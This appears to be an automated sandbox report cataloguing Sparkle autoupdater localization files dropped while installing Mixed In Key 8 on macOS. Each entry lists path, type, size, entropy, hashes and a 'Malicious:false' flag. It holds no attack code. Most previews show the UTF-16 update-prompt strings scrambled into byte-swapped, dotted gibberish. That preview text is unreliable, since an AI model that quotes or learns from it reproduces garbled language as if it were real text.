                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..s atots aciracote d..p ortn oep rseeseru itilzzta!oD sedire initslaalere r aivvaier 1%@$o ar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =I"pmsoisibela ggoinrra e1%@$q audn oivne esegeiuotd anuv lomu eids lo aelttru aocemu .n..miamigend sioco u .n..nuti..o ttci.aS optsra e1%@$n lealC raetll apAlpcizaoiin ,irvaivraole r pioraver"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .alv reisno eip..r ceneeta ttaumlneetd siopinibel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..d siopbnli;ed siopind lealv reisno e3%@$ .eDisedire esugri e.l..gaigroanemtn oro?a;"..%" @odnwoldade " =%" @csracita"o.;".@%o f@% " =%"$1 @id% $2"@.;". Aen wevsroi nfo% @sia avlibael"!=
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_e9JCoi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4122
                                                                                                    Entropy (8bit):5.670129832466164
                                                                                                    Encrypted:false
                                                                                                    MD5:4DD8CB383D73BC835678A965208A162A
                                                                                                    SHA1:AFEA320D4120BD2D3D140C8F4E34F50DF9772718
                                                                                                    SHA-256:A4819EC90F564A71EC906005921C8EDC090EDAAF19990E706FF49C4B24FCDCFC
                                                                                                    SHA-512:FACE8F4CD789A77A8AD9DFD1F731BA2AE1F2DE30912058E992D2A7F60575B6FB2C95C6E3777B7A10F3D42A803BDA4A718304D1D8E4811BC823EC93CB47F7293B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................................................% $1 @..........................................................................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ......................................................................................................................................................................%.$1 @..................................................................................................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @......................................................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. .................................................... .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_6CbDDd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3490
                                                                                                    Entropy (8bit):5.7492033708150565
                                                                                                    Encrypted:false
                                                                                                    MD5:2F74C221BEE30ECE6DE6B251A24091B9
                                                                                                    SHA1:A6D2E8B3B09BAE5D320E4B181A7CC1902FF7CF5B
                                                                                                    SHA-256:73D6AF660F2E59D43B1D0DE2AA0CA3E6F11E0044F3A1E29AB16FFBC3C1E312CA
                                                                                                    SHA-512:FA2CE6B9F798A4F48D5E4CEE0033F303592756A246F58EACA350757ABBF8A8A4D7E673357A671144DBF5D4740653421DB94BFCFB945B4F2F9652BD44A78847AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2.@...(.. )............. .............. ............... .................... ......... ................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$..(...).. ......... .......... .DC. .......... ........ .... ........ .......... .............. .......... .............. ... ... ............% $1.@...(.. )................... ......... .......... ........ ......... ............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2.@...(.. )....... .... .................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$..(...).. .......... .................( ....... .... . :3%@$ )............. ................?.;"..%" @odnwoldade " =%" @............. ...."..;".@%o f@% " =%"$1
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_lxbJhm
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3926
                                                                                                    Entropy (8bit):4.792603716238071
                                                                                                    Encrypted:false
                                                                                                    MD5:BC7B6D1A52851036451241DB1D63DF03
                                                                                                    SHA1:76BCE213F254401292F8432A6A2A59A646065359
                                                                                                    SHA-256:5BEF32AC7ED813273760E05384DD5C38B8D874BD0EF801BCDBC8359D280A2E75
                                                                                                    SHA-512:94F5E27807E65A977E621C62A32DE44FD55EB9F48ABDD413F9D61B1BC1009C17D013E1E7CB415D1D1CC77E54CEDE212024E5509C558CA66E369DB70B253BC51F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @sig dewolnao dnei slkaa rovrog beurki !iWtlu % $1 @uni snatllrenee nehsrattrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nintew roed negpuadeta slh tev nae nea llee-nelez novulem ,ozla see ncsihfjokip efoC ,Dg oeepdni .sV relpaast% $1 @anrad eaM p..P.orrgmaam..s...,.h retsra tav nadra ,nep orebreo npeiwu"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$i somemtnee ledr cenestetv reis.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$i sunb sehckiabra..u.h eetf% $3.@W li t ueh tund wolnaoed?n;"..%" @odnwoldade " =%" @egodnwolda;"..%" @fo% "@= " 1%@$v na% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " eE ninueewv reis eav n@%i sebcsihbkaa!r;"..A"n wev re
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_AC3tHK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2514
                                                                                                    Entropy (8bit):4.757764323583795
                                                                                                    Encrypted:false
                                                                                                    MD5:12275E60C36D9C618F995ADE804347EC
                                                                                                    SHA1:9BE178C69AD2E0B2072A5E32C02ACF623A670224
                                                                                                    SHA-256:3B579F41B32DC344ED02C583EA67D7E712E162377B4AD6D46C663E764B82BBD5
                                                                                                    SHA-512:EF5E014E7B9B56DBC3E292A6D5A89C4AADDD6BEFCAA700DB61CE0F1D0F1C75E8237B9A0152A5AF3DA31346C5CE6FF03E85BF08F1EA122FA7F5F807FFFD91E7BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah rlbti tnitslaeltro grek al rit lrbkun seetg na g3%@$s attrreo pp !iV luds attr e.p .ynttn .."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e red nynseett lijgneegilegv rejsnone"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e r.n .itglejgnlegi( udh ra% $3)@ ...snek rud. .alts eed nen d.n?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h rai kk eitglnasgerttgiehet rit l..s rkvi eit lrpgoarmmte sifblna!eS attrred urf aned sifkli ?vHsii kk,es .pr.d nis syetammdnisirttaroo mjhle.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =E" nynv rejsnoa v@%h rab iltti snatllre!t;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv rejsnoa v@%e ritglejgnlegi"!.;".nAe rr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_rciL5N
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3858
                                                                                                    Entropy (8bit):5.0187789669222775
                                                                                                    Encrypted:false
                                                                                                    MD5:A6FA5DFECFD42E36A84351B08A9FD16F
                                                                                                    SHA1:D949A210F9FE8764BF91550DAB60CA06CADD2314
                                                                                                    SHA-256:D670F74D95B059F7B44A94978D07DDC39528CDD5AD00EBBC529900C9C1A96AFD
                                                                                                    SHA-512:782EDABDE74D899827BAE351C156BC91AB7463984CD8096AF7A6052501D9A65D113794463E0FD7BD4228C01EF19959684E61C98640B8290BA86658F2A63D4A05
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..*/" 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"? ;/*".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$z soat..p boaryni j se togotywd o.uy.ic!aC yzc chai..yb..t rezaz iasnatolaw..i p nowoin erucuohim..% $1?@;"..*/" 1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni". ;/*".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt yga
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_cOVAUX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3250
                                                                                                    Entropy (8bit):4.912928929280295
                                                                                                    Encrypted:false
                                                                                                    MD5:A39C1047D2E1DE35BC79A6B6F5D35690
                                                                                                    SHA1:DE78D93D19530126B43DF7F8C6844F53623BD280
                                                                                                    SHA-256:8177B0F6884F81FEC257CB7A856FA0742B95931FAEBEE60C233975E8657C5295
                                                                                                    SHA-512:93A8D362322EB2D5EE9C4A539E3C4B11FAEFE09CBF686A9E7E94D03EB5324FFCD792DE17BF9F459FF0AB56A0AACDD939859FE888A86EFB792C28D6AAE53B4BE0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @of iabxida o ese.t .rpnootp ra asu!oG soatir aedi snatal r eerniciai r o1%@$a ogar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.no.p do ees rtaauilazode qnautn oof rxecetuda o aaptrrid emuv lomu eosemtn eedl ieutar ,ocomu ami ameg medd sioco uDCD/DV .oMav% $1 @apara p saatA lpcitaviso ,ernicieio-e t neetn vomaneet"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. . aevsr.. oamsir ceneetd siop.nv.le"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsno..ev-ls-auv re.so.. .3%@$ .oGtsraaid eabxi..l- ogaro?a;"..%" @odnwoldade " =%" @abxida"o.;".@%o f@% " =%"$1 @ed% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " mU aonavv re.so.d o@%e ts..d siop.nv.le
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_1swI2W
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3412
                                                                                                    Entropy (8bit):4.852061466756839
                                                                                                    Encrypted:false
                                                                                                    MD5:ECC3E2D238E3A4081FE146066BD68D68
                                                                                                    SHA1:67545F691F19D42E54F892676DE289092109F443
                                                                                                    SHA-256:EC7CC3871D3E8131EE6CEA1951878E2DAD645ED4572AE2C6A6976AC143894E34
                                                                                                    SHA-512:9D15C9CFBF3F809F04B1107BE2ABD215A760223D339F311B4CA7A3432EDE974FE3C0009F879E7F443C7EC6472F1A4D11E01F8D67673966B3AD73B97FB94942CE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " O1%@$% $2 @of irtnafsredi o ese.t .rpnoota i snatal!rG soatir aedo f zarea ogare r ieinicrao % $1 @optsreoimrneet"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =O"% $1 @.no.p do ees rcautlazida ouqnaode tsvirea s ree exucatoda p rait redu movulema epan sedl ieutarc mo omu amigamed eidcs ouod sioc. p.itoc .oMavo % $1 @apara s aup saatA lpci.a..e.,sr ieinic-e o.a . eettn eonavemtn.e;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " O1%@$% $2 @..n seetm moneota v re.so.m ia serectn eidpsno..ev.l;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =O"% $1 @2%@$e ts..a ogard siop.nv.lee t mea v re.so.% $3.@G soatir aedo t arsnefir rgaro?a;"..%" @odnwoldade " =%" @rtnafsredi"o.;".@%o f@% " =%"$1 @ed% $2"@.;
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_S1fqDs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4012
                                                                                                    Entropy (8bit):4.937256495022775
                                                                                                    Encrypted:false
                                                                                                    MD5:85F6A19EDEFE691A185ABE3D9334B475
                                                                                                    SHA1:A927473A4577D28E47A0509D4E59A734FFC644A4
                                                                                                    SHA-256:C731F50896200CED0E8126B22F890FD99566B06192015F6CFEB9EEDB708C0E76
                                                                                                    SHA-512:90A751B82764EDFA132E57C0B1C94C0B58C8DF7492CB29C952B69DA8E7C47E64D42506111113ACE25E077259C9D8D6721A2A9F26DD253EF0D6B8C1EC161E52E7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ aoftsd se.cr.ac t.. iseetg ta aedu itilazer !oDir.. i.s ... lnitsla.ai.. i.s ..l-r lenaas.. i1%@$a uc?m;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n uopta eif icautlazita..a utcn i.cn. dseetp roin.t .edp enuv lomur ae-dnoylc a omigani eidcss uao u inateto tpci.. .uM.t .1%@$. n.d riceotur lpAlpcitaoisn ,eropnr.et.-e oeda ocol. i.. n.ecraacd nin uo"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e ts e.. nrpzene tec aam ion.u .evsruiend siopinib.l..;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ts eidpsnobili....-.uta i3%@$ .oDir.. i.s . oedcs..cr.ai.a uc?m;"..%" @odnwoldade " =%" @edcs..crta;"..%" @fo% "@= " 1%@$d ni% $2"@.;". Aen wevsroi nfo% @sia avli
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_poMeIt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4456
                                                                                                    Entropy (8bit):5.207728062803533
                                                                                                    Encrypted:false
                                                                                                    MD5:769C9A0037E04CD9A40E3EDBA1A766D7
                                                                                                    SHA1:B568AD5200E98B02CB7A25DD7510608510360933
                                                                                                    SHA-256:B901B30035274FB2A8D3F1347687B23808D8F90A238F5ED9BF7531402A1E1EB8
                                                                                                    SHA-512:A4DA065F6EAA90B696C9273B9A20B4728E6B5CEBAFD5B0E1D9ACA4EA798E3DE0B1C9ADC0F5427A9D4F26A680ABB3FB9BA1378D88F6F872FCFDD218AAF5C43DC6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................. ............ ........................... !............. .................. .... ........................ .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =.".. ............ .......... .1%@$. ......... ,................................. .......... ........ ..........,.. .... ................. ,............. ........ ........ .................. ...... .................. ............. ,....... .................. ................. .......................% $1 @... ........ ..................... ,........................... .... .............. .................... ..............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ... ................ .............% $1 @2%@$. .............. ...............
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_0PMEqd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3380
                                                                                                    Entropy (8bit):5.089001636965965
                                                                                                    Encrypted:false
                                                                                                    MD5:8183D0201D72055F55B7EFC27E301EE1
                                                                                                    SHA1:FA04D8B5DC4814EA88319E1DCAAD1EB9B4632583
                                                                                                    SHA-256:B9F6711D4C2F7F84B575AA952BCC86F25CCA8B7C6A1D097652F357D361E630FB
                                                                                                    SHA-512:D35DA5352994D66E50AA1814B9F2473A23BB624ECE75D5D4F39C26B4909C2A8221768CEAB79D0221DE279017B9410ED8B98A11FF00389519D53A84995219F320
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " pAil.kc.ai% $1 @2%@$b lo arpveaz.t . aejp irrpvane..n aop.ui.it!eC chte eetar zanni..atolav..a n ..lsdeenz onuvs upts.i .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =A"lpki..ic u1%@$n me.on. okautlazivo.a,.a kejs uptsne..z ovz..kz u srp..aviml nen a....atin en(pa.rk.al d zboaruzd siuka elobo tpci.kh. oidks)u .rPse.ut. epail.kc.ui% $1 @odp ir.ei.kn apAlpcitaoisn ,pssuitetj udoit.a . aopot mnzvo aks..ts ekautlazi..ic.u;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2\@jn eannjvo..aid soutnp..v reiz.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =J" eodtspu.n .pail.kc.ai% $1 @2%@$. ..m ..et% $3.@C chte eujp erzvai..t reza"?.;".@%d wolnaoed"d= " @%p erzvta..;"..%" @fo% "@= " 1%@$z
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_kmCfND
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6830
                                                                                                    Entropy (8bit):3.46495966795087
                                                                                                    Encrypted:false
                                                                                                    MD5:6638FE0CDC41D8E56D382A756D8F6CFB
                                                                                                    SHA1:760501E45FD62794DDF4E03A4136BC73414D9F52
                                                                                                    SHA-256:18DD67772BCB35F45A15E8DAA30AC67771EF5C067909F22EC92271369C9F6BD8
                                                                                                    SHA-512:CF1F3E8D62EAF83A5AE0169493BE342B27749E9436B1EF62D5917C95156190CD76C8FC1CC5921208455C44982A28EFDA7A5BBE1554D3F7319C685DD84BF61BF8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .j.e. .b.i.l. .u.s.p.e.a.n.o. .p.r.e.n.e.a.e.n. .s. .s.p.l.e.t.a. .i.n. .j.e. .p.r.i.p.r.a.v.l.j.e.n. .n.a. .n.a.m.e.s.t.i.t.e.v... .G.a. .~.e.l.i.t.e. .n.a.m.e.s.t.i.t.i. .i.n. .p.o.n.o.v.n.o. .z.a.g.n.a.t.i. .t.a.k.o.j.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".P.r.o.g.r.a.m.a. .%.1.$.@. .n.i. .m.o.g.o...e. .p.o.s.o.d.o.b.i.t.i.,. .k.e.r. .g.a. .p.o.g.a.n.j.a.t.e. .i.z. .l.o.k.a.c.i.j.e.,. .k.a.m.o.r. .p.i.s.a.n.j.e. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_GfOTKx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3376
                                                                                                    Entropy (8bit):4.898536554281551
                                                                                                    Encrypted:false
                                                                                                    MD5:19CFEBADD873E045E4DC4BF5B8506FB1
                                                                                                    SHA1:0BD0E287DBAD7DC9D41B46D059F2AA8CC210E42E
                                                                                                    SHA-256:BB9593FD660C05BEDC7DEB9E190C68FA51ADCEA0C8F37107930B1B17BE26C0E5
                                                                                                    SHA-512:0CE7256082EF3C415B592D43FE7225F80C1DA6C221C167AAD76114A27AFED333CD35232C15639B0912CFEFCC74872B8D588DC94CA965DEC0C2EBD84C3C25C6E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
